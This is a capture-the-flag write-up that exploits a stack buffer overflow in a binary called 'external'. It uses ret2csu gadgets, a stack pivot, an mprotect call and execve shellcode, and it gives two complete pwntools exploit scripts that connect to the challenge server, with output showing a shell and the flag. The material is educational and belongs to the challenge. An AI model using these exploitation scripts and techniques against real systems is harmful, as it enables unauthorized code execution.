External

Recon

As usual, we’ll start off by taking a look at the mitigations enabled in the binary:

$ checksec --file=./external  
RELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH      Symbols         FORTIFY Fortified       Fortifiable     FILE
Partial RELRO   No canary found   NX enabled    No PIE          No RPATH   No RUNPATH   81) Symbols       No    0               3               ./external

Cool, there’s no PIE and no canary, that will simplify things a bit in case we find a buffer overflow. Additionally, after opening the file with cutter we see that it’s linked against libc, this may come in handy as well, since the GOT is writeable. Now, we’ll take an actual look at the disassembly itself, this is the code for main:

: int main (int argc, char **argv, char **envp);
; var void *buf @ rbp-0x50
0x00401224      push    rbp
0x00401225      mov     rbp, rsp
0x00401228      sub     rsp, 0x50

		; puts("ROP me\n")
0x0040122c      lea     rdi, str.ROP_me ; 0x402012 ; const char *s
0x00401233      call    puts       ; sym.imp.puts ; int puts(const char *s)

		; printf("> ")
0x00401238      lea     rdi, [0x0040201c] ; const char *format
0x0040123f      mov     eax, 0
0x00401244      call    printf     ; sym.imp.printf ; int printf(const char *format)

		; read(0, buf, 150)
0x00401249      lea     rax, [buf]
0x0040124d      mov     edx, 0xf0  ; 240 ; size_t nbyte
0x00401252      mov     rsi, rax   ; void *buf
0x00401255      mov     edi, 0     ; int fildes
0x0040125a      call    read       ; sym.imp.read ; ssize_t read(int fildes, void *buf, size_t nbyte)

		; clear_got()
0x0040125f      mov     eax, 0
0x00401264      call    clear_got  ; sym.clear_got

		; return 0
0x00401269      mov     eax, 0
0x0040126e      leave
0x0040126f      ret

; comments added for clarity

It seems simple enough, it will print a pretty suggestive message (namely, “ROP me\n> “), read from stdin into a buffer on the stack, and then call clear_got. clear_got does exactly what one would expect, it memsets the whole GOT to 0 (more on this later). If we look at the buffer in which our answer will be stored, we can see it begins at address rbp-0x50 but it will read 0xf0 bytes into that buffer, resulting in a buffer overflow and giving us control over both the rip and rbp after the function returns (remember that leave; ret will move rbp to rsp and pop both rbp and rip from the stack).

So far we can overflow the buffer to overwrite the rip stored in the stack, and make main return to whatever address we want. Recall that PIE is not enabled, this means that the binary will be loaded into the same virtual memory address every time the program is executed. And if the binary is always loaded into the same address, then every address within the binary will remain constant across different executions, and will be the same on remote as well. What all of this means is that we can just hard-code addresses into the payload, since they’re guaranteed to be the same on remote (this only applies to addresses within the binary, not to stack addresses and so on). This will be a huge benefit when we start working on our ROP chain.

While I’m at it, here’s a quick remainder on ROP (Return Oriented Programming). Basically, it works by changing the return address of a given function (in our case, main). We’ll make main return to an un-intended address, where there’s some code that’s of interest to us. The program will continue to execute that code until it hits another ret, at which point it will return to whatever address is found on the top of the stack. If at the time of sending the payload we get the math right, we can make that second ret jump to another portion of code that’s of interest to us, and so on. We’re only limited by the amount of bytes we’re able to write during the first read (we can write 0xf0 bytes, but the first 0x50 will be ignored becase they reside inside the stack frame for main, that leaves us with 0x40 bytes for our exploit), and by the availability of ‘interesting’ portions of code that end with a ret instruction.

At this point it looks like all of this will be pretty easy, right? There’s only one problem, the GOT has been zero-ed out. Why is this important? Well, the GOT (Global Offset Table) hold the address for every libc function our binary could possibly want. When we make a call to a libc function, the program will lookup the address of that function in the GOT, and then jump to it. This is what a call to printf does, as an example:

: int printf (const char *format);
0x00401050      jmp     qword [reloc.printf] ; 0x404028
0x00401056      push    2          ; 2
0x0040105b      jmp     section..plt

As you can see, the first thing printf does is jump to whatever address is stored in 0x404028, that’s the entry for printf in the GOT. When the binary first loads, that address will be filled with the qword 0x401056, so jumping to reloc.printf will do nothing but going to the next instruction. When that happens, the dynamic linker will be called, and it will fill the GOT with the correct address for printf. After that, reloc.printf will point to the actual code for printf, which means any subsequent calls will be resolved much faster.

Exploitation

Now let’s move on to the actual exploit.

As you can probably imagine, in order to bypass the fact that the GOT has been erased, we could jump directly to 0x401056 and have the GOT entry for printf re-populated. We could do that for every libc function, and then go from there. That’s entirely doable and it was, in fact, our first approach. We constructed a ROP chain that would call all of the libc functions in the GOT. This would re-populate the GOT, and give us the possibility of using libc functions again. Once this was done, we would call printf with the right arguments in order to leak addresses from the libc and calculate the address of system. Finally, would have everything we needed to call system("/bin/sh").

And it worked… locally. For some unkown reason this exploit worked like a charm on our local hosts, but not on remote. After some debugging we found that calling memset was bringing up trouble (maybe because we couldn’t control the third argument passed on to it, so it would try to memset too many bytes?).

For a more in-depth explaination on how to leak libc addresses, and how that helps to identify what libc version is being used on remote check out the write-up on The Pwn Inn from this same CTF, in which we dive into a lot more detail on how it works. Since this was not the way we ended up solving the challenge, we won’t delve into too much detail on it right now (though the code we tried can be found at the end of this write-up).

At last, we decided to go down a different path, we’ll try to invoke mprotect somehow, and get the stack to be executable. At that point we can open up a shell with a little bit of shellcode, no libc involved. There are only two problems: 1) we don’t know where the stack is located, 2) we lack gadgets.

Quick note for those un-familiar with ROP. Remember how I talked about using ‘interesting’ bits of code ending in a ret instruction before? It turns out those pieces of code are called ‘gadgets’.

Let’s quickly address each of these issues:

Finding gadgets

As it turns out, we’re surprisingly low on gadgets. We need at the very least five things: a way to control rax, rdi, rsi and rdx, plus a syscall instruction. Why? Well, if we want to make a mprotect syscall we’ll want to control all three parameters passed on to it (these are stored in rdi, rsi and rdx respectively), the syscall number is stored in rax and the syscall is made with the syscall instruction. We’re asking for a lot of things here, but the only useful gadgets we’ve managed to find are:

$ ROPgadget --binary ./external                                                                                                                                                       1 ⨯
Gadgets information
============================================================
0x0000000000401269 : mov eax, 0 ; leave ; ret
; ...
0x000000000040127d : mov eax, 1 ; syscall
; ...
0x00000000004012f3 : pop rdi ; ret
0x00000000004012f1 : pop rsi ; pop r15 ; ret
; ...
0x000000000040101a : ret
; ...
0x0000000000401277 : syscall

Unique gadgets found: 106

And of course we can also use some parts of the actual disassembly as well.

Well, we can control rdi, rsi, invoke syscall with rax equal to 1 or 0, and not a whole lot more. But if we look closely at the code we can find something useful:

: __libc_csu_init (int64_t arg1, int64_t arg2, int64_t arg3);
; arg int64_t arg1 @ rdi
; arg int64_t arg2 @ rsi
; arg int64_t arg3 @ rdx
; ...
0x004012d0      mov     rdx, r14
0x004012d3      mov     rsi, r13
0x004012d6      mov     edi, r12d
0x004012d9      call    qword [r15 + rbx*8]
0x004012dd      add     rbx, 1
0x004012e1      cmp     rbp, rbx
0x004012e4      jne     0x4012d0
0x004012e6      add     rsp, 8
0x004012ea      pop     rbx
0x004012eb      pop     rbp
0x004012ec      pop     r12
0x004012ee      pop     r13
0x004012f0      pop     r14
0x004012f2      pop     r15
0x004012f4      ret

Isn’t this a bit interesting? Say we jumped to address 0x4012ea, then rbx, rbp and r12 through r15 will be popped from the stack, then a ret will be executed. What if that ret jumped to address 0x4012d0? Then all those values previously popped from the stack would be inserted into rdx, rsi and edi. That’s just what we want!

Actually, using this approach we can write an arbitrary value into edi (the lower 32 bits of rdi), but we don’t need to worry that much about this, because all of the addresses we’re interested in fit in one dword, plus writing to edi zeros out the higher 32 bits of rdi.

There’s a catch though, r15 + rbx * 8 will need to point to an address where another address is stored. That second address should point to some code that won’t modify rdx (ideally none of the previous registers, but rdx is the only one we really can’t afford to lose), and that will eventually lead to a ret. Also, since the instruction at 0x4012d9 is a call, it will push the rip into the stack, so our ROP will not continue until the ret at 0x4012f4 is executed (and, for that to work rbp should be equal to rbx minus 1).

This isn’t so bad as it may seem at first glance, though. If we load 0x403e38 into r15 and 0x0 into rbx then that call at 0x4012d9 will take us to the following bit of code:

: _fini ();
0x00401308      endbr64            ; [14] -r-x section size 13 named .fini
0x0040130c      sub     rsp, 8
0x00401310      add     rsp, 8
0x00401314      ret

That’s because, for whatever reason, the qword stored at 0x403e38 is equal to 0x401308 (don’t ask me where I got that from, hours of staring at hexdump’s output were involved). Since rbp should be equal to rbx minus 1, and rbx needs to be 0x0, we don’t have a choice but to load 0x1 into rbp.

This is getting a little convoluted, I hope I didn’t lose you so far. To summarize, the only takeaway here is: rdx is ours, but changing its value will cost us a lot of space in our ROP chain. This isn’t really a problem though, since we can just use this gigantic ROP chain to fire a second read syscall. One might (fairly) argue: Why make such an annoying ROP chain just to invoke read again? Well, now that we control the arguments passed on to read, we can make the second read call read an enormous amount of bytes, and store the result in a known address. As we’ll see, this will come in handy later on.

Where did those two functions _fini and __libc_csu_init come from? Well, it turns out these are pieces of code that the compiler automatically attaches to our executable every time we compile a program (at least gcc does it on GNU/Linux). Using these gadgets is known as ret2csu, you can read more about it and how it’s used on this paper.

Finding the stack

I’ll say this upfront: we don’t need to find the stack. After the read discussed in the previous section is executed, we can use the region of code used for storing the results as a fake stack. It’ll work like this:

  • Use the ROP chain discussed previously to read as many bytes as we want into address X (we need to make sure this address is writeable first)
  • Make rsp point to address X
  • Continue executing our ROP from there

That’s it! Now we’ve got a larger buffer that we can use to invoke mprotect, since our ‘stack’ is now at a known address we can make that region executable, and finally jump to our shellcode (which should be stored there as well).

Invoking mprotect

Quick sidenote on invoking mprotect: we’ve no direct control over rax, to get over this we can use our ROP chain to invoke a write syscall.

Recall that we now control rdi, rsi and rdx, and that there’s a gadget that does mov rax, 1; syscall; ret (1 is the syscall number for write), so invoking syscall with the right arguments should be no problem.

We can tell the kernel to write 0x0a bytes (the syscall number for mprotect) from any readable address into the standard output, as a result the kernel will store the number of writen bytes (0x0a) into rax. As you can see, it just takes a little bit of work, but that way we can control rax as well!

Putting it all together

All of this might feel a bit overwhelming because of all the details involved, but try to keep in mind the core idea:

  • We have a way of invoking a read syscall controlling all of it’s arguments, so we read an awful amount of bytes into some address X.
  • We make rsp point to that address (using gadgets like leave; ret, since we have control over rbp).
  • Now the ‘stack’ will be located at a known address and we have total control over it’s contents. So we use this fake stack to call write(1, [whatever], 0x0a) using the same mechanism as used in step 1. Effectively filling rax with 0x0a.
  • Now that rax is 0x0a we again use the same mechanism as the one in step 1 to invoke a syscall that will make the whole memory page at X executable.
  • We jump to our shellcode, which will be stored at X + [someOffset]

The resulting exploit will look something like this (using Python and pwntools):

from pwn import *

context.update(os='linux', arch='amd64')

p = remote('161.97.176.150', 9999)

# First payload, this will just trigger read(0, 0x404000, 0x1000)
# Why 0x404000? Well, that's a read-write memory section, that means the whole page 
# is read-write, so we've got 0x1000 bytes to play around with at that address
payload0 = b''
payload0 += 0x58 * b'A'      # padding
payload0 += p64(0x4012ea)    # address of gadget 1 (pop rbx; pop ... ; ret)
payload0 += p64(0x0)         # rbx
payload0 += p64(0x1)         # rbp
payload0 += p64(0x0)         # r12
payload0 += p64(0x404000)    # r13
payload0 += p64(0x1000)      # r14
payload0 += p64(0x403e38)    # r15
payload0 += p64(0x4012d0)    # address of gadget 2 (mov rdx, r14; mov ...; call [r15 + rbx * 8])

# Since after the call instruction (address 0x4012dd) rbx, rbp, 
# r12-r15 will be popped again, we need to add some padding
payload0 += (7 * 0x8) * b'A' # padding
payload0 += p64(0x401283)    # address of syscall ; ret
payload0 += p64(0x4012ed)    # address of gadget 3 (pop rsp; pop ... x3 ; ret)
# Address of our new 'stack' (will be poped into rsp)
payload0 += p64(0x404000)

p.info('Sending ' + hex(len(payload0)) + ' bytes')

p.recvuntil(b'> ')
p.send(payload0)

# This payload will be read into our fake stack, we need to remember that because
# of gadget 3 from payload 1 (pop rsp; 3 x pop ; ret) we need to insert 0x18 bytes of
# padding at the beginning

payload1 = b''
payload1 += b'A' * 0x18      # padding

# Let's trigger write(1, 0x404000, 0xa) so we can set rax to 0xa
# Same concept as before, fill rdi, rsi, rdx with the desired values
payload1 += p64(0x4012ea)    # gadget 1
payload1 += p64(0x0)         # rbx
payload1 += p64(0x1)         # rbp
payload1 += p64(0x1)         # r12
payload1 += p64(0x404000)    # r13
payload1 += p64(0xa)         # r14
payload1 += p64(0x403e38)    # r15
payload1 += p64(0x4012d0)    # gadget 2
payload1 += (7 * 0x8) * b'A' # padding
payload1 += p64(0x40127c)    # mov rax, 1; syscall ; ret

# Now that rax is set to 0x0a, let's trigger mprotect(0x404000, 0x1000, 0x7)
# Again, same concept, fill rdi, rsi and rdx with the desired values
payload1 += p64(0x4012ea)    # gadget 1
payload1 += p64(0x0)         # rbx
payload1 += p64(0x1)         # rbp
payload1 += p64(0x404000)    # r12
payload1 += p64(0x1000)      # r13
payload1 += p64(0x7)         # r14
payload1 += p64(0x403e38)    # r15
payload1 += p64(0x4012d0)    # gadget 2
payload1 += (7 * 0x8) * b'A' # padding
payload1 += p64(0x401283)    # syscall ; ret

# Address of our shellcode, our payload begins at address 0x404000, so we should add
# the current length of the payload plus 0x8, to account for this value
payload1 += p64(0x404000 + len(payload1) + 8)

# Basic shellcode that triggers execve('/bin/sh', 0, 0), since the 'read' syscall
# is used to read the shellcode we don't need to worry about special characters 
# null characters, or anything of the like
shellcode = b'\xb8\x3b\x00\x00\x00\x48\x8d\x3d\x08\x00\x00\x00\x48\x31\xf6\x48\x31\xd2\x0f\x05\x2f\x62\x69\x6e\x2f\x73\x68\x00'
payload1 += shellcode

p.send(payload1)
p.info('Sending ' + hex(len(payload1)) + ' bytes')

# Recieve those 0xa bytes we've written so that the output doesn't get poluted
p.recv(0xa) 

# Profit!
p.interactive()

The exploit in action:

$ python exploit.py 
[+] Opening connection to 161.97.176.150 on port 9999: Done
[*] Sending 0xe8 bytes
[*] Sending 0x13c bytes
[*] Switching to interactive mode
$ ls
bin
dev
etc
external
flag.txt
lib
lib64
usr
$ cat flag.txt
flag{0h_nO_My_G0t!!!!1111!1!}
$  

Honorable mentions

For those of you who are curious, here’s the initial attempt that we made which I talked about earlier (populating the GOT and calling system):

from pwn import *
import sys

context(os='linux', arch='amd64')

binary = ELF('./external')

# This is the libc in use on remote. We found out the version
# by leaking addresses and looking at the offsets between them
libc = ELF('./libc-2.28.so')

off_printf_got = binary.got['printf']
off_system_libc = libc.symbols['system']
off_printf_libc = libc.symbols['printf']
off_binsh_libc = next(libc.search("/bin/sh"))

exploit  = b"\x41" * 0x58       # buffer + rbp
exploit += p64(0x4012f3)        # pop rdi ; ret
exploit += p64(0x402012)        # rdi = &"Ropme"
exploit += p64(0x401056)        # printf call
exploit += p64(0x4012f3)        # pop rdi ; ret
exploit += p64(off_printf_got)  # rdi = printf@got
exploit += p64(0x401036)        # puts call
exploit += p64(0x4012f3)        # pop rdi ; ret
exploit += p64(0x404050)        # rdi -> data section
exploit += p64(0x401066)        # memset call
exploit += p64(0x401086)        # read call
exploit += p64(binary.symbols['main'])

p = remote('161.97.176.150', 9999)
p.recvline()
p.recvuntil(' ')
p.sendline(exploit)
printf_libc_addr = p.recvline()
printf_libc_addr = u64(printf_libc_addr[9:-1]+"\x00\x00")

system = printf_libc_addr - off_printf_libc + off_system_libc
binsh = printf_libc_addr - off_printf_libc + off_binsh_libc

log.info("printf @ {}".format(hex(printf_libc_addr)))
log.info("offset printf @ {}".format(hex(off_printf_libc)))
log.info("offset system @ {}".format(hex(off_system_libc)))
log.info("offset /bin/sh @ {}".format(hex(off_binsh_libc)))
log.info("system @ {}".format(hex(system)))
log.info("/bin/sh @ {}".format(hex(binsh)))

exploit2  = b"\x41" * 0x58       # buffer + rbp
exploit2 += p64(0x4012f3)        # pop rdi ; ret
exploit2 += p64(binsh)           # rdi -> /bin/sh
exploit2 += p64(system)

p.recvline()
p.recvuntil(' ')
p.sendline(exploit2)
p.interactive()

Post written by @OctavioGalland